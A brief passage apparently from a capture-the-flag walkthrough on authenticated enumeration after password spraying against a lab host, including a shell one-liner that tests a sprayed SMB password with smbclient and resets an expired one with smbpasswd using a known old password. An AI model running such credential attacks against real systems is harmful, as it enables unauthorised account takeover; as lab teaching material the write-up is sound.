Authenticated Enumeration

After spraying the passwords I was able to get the credentials various users.

These however when I was spraying them on CME, I was told to change the password. Using this script right here to change the passwords automatically if the password is correct I was able to enumerate the services further.

if echo "$pass" | smbclient -L //10.10.10.193 -U bhult 2>/dev/null >/dev/null; then echo "Password $pass still good"; else pass=$(date +%s | md5sum | base64 | head -c7; echo .); (echo 'Fabricorp01'; echo "$pass"; echo "$pass";) | smbpasswd -r 10.10.10.193 -s bhult; echo "password reset to $pass"; fi;

After the fi; we can query any command we want.

PreviousSMB NextDNS

Last updated 2 years ago